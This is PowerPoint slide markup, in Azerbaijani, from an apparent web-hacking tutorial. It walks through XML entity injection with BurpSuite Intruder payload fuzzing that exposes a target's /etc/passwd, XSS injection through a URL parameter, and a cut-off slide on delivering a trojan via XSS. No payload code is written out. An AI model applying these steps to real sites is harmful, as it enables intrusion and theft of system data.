              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enjeksiyonu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> deyilir, təcavüzkarın bu işarələmə dilindən istifadə edərək XML məlumatlarının </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>işlənməsinə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> müdaxilə etməsinə imkan verən bir təhlükəsizlik zəifliyidir. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048883" name="Metin kutusu 1048882"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9221098" y="322644"/>
            <a:ext cx="2080962" cy="1513839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr" sz="9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2800">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55" name="Şəkil 4" descr="Şəkil ehtiva edir stol  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="46901"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9338553" cy="3133726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097256" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1184"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3205972"/>
            <a:ext cx="9338553" cy="3652028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048813" name="Mətn Qutusu 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9496425" y="276225"/>
            <a:ext cx="2600325" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İlk öncə XML açığı olan shifəmizə giririk shifənin linkində test tağı açılıb hacker yazısı yazdırılıb</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57" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="13397"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6454699" cy="3332867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097258" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3245807"/>
            <a:ext cx="6454698" cy="3612193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048814" name="Mətn Qutusu 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581775" y="219075"/>
            <a:ext cx="5486400" cy="4917440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bu açığın istismarını </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> kodları vasitəsi ilə edəcəyik tapdığımız </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> kodlarının hamısını </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vasitəsi ilə avtomatik şəkildə yoxlayırıq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brauzerlə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> arasında bağlantı qururuq gələn bağlantını </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İntruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bölməsinə göndəririk.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048815" name="Düzbucaqlı 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286125" y="5143500"/>
            <a:ext cx="1009650" cy="16192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az-Latn-AZ"/>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59" name="Şəkil 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9458326" cy="5643392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048816" name="Mətn Qutusu 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9458326" y="0"/>
            <a:ext cx="2733674" cy="5044440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>düyməsi ilə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> başladırıq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>əməlyat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bitdikdən sonra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bölməsinə nəzər yetiririk fərqli bant uzunluğunda olan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payloadları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hədəfdə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yoxluyuruq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>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97260" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="12180669" cy="4620638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048817" name="Mətn Qutusu 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136187" y="4737371"/>
            <a:ext cx="11361907" cy="1691640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-cu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payloadımız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> uğurlu nəticə verir həmən </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payloadı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hədəfə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yapşdırdıqda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bizə hədəfin istifadəçi verilənlər bazasını yəni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>faylını göstərir.</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ"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48633" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>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48634" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>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61" name="Şəkil 6" descr="Şəkil ehtiva edir mətn, ani görüntü, monitor  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1183624"/>
            <a:ext cx="9414375" cy="5083764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048635"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2097162" name="Şəkil 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="242281" y="351913"/>
            <a:ext cx="7248018" cy="479798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="228600" cap="sq" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:innerShdw blurRad="76200">
              <a:srgbClr val="000000"/>
            </a:innerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048636" name="Mətn Qutusu 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7732580" y="191702"/>
            <a:ext cx="4459420" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>Link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> bölməsində </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0"/>
              <a:t>‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0"/>
              <a:t>‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>işarəsindən sonra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>kopyaladığımız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> kodu yapışdırırıq </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048637" name="Mətn Qutusu 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9414375" y="1397674"/>
            <a:ext cx="2680355" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>‘’M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>örtərizələrin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> içərisinə istədiyimiz mesajı yaza bilərik və həmən an shifədə olan hər bir istifadəçinin ekranına yazılan mesaj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>çıxır</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048638" name="Mətn Qutusu 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9414375" y="3620702"/>
            <a:ext cx="2548240" cy="2400657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nəticə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>Hədəf shifədə olan XSS açığı sayəsində istədiyimiz </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>HTML və JavaScript kodlarını shifədə tədbiq edə bilərik.</a:t>
            </a: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48639" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>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145730" name="Straight Connector 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1"/>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48640"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1" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078992" y="1143000"/>
            <a:ext cx="9052560" cy="3546179"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>açığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ilə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hədəfə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> trojan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yüklətmə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
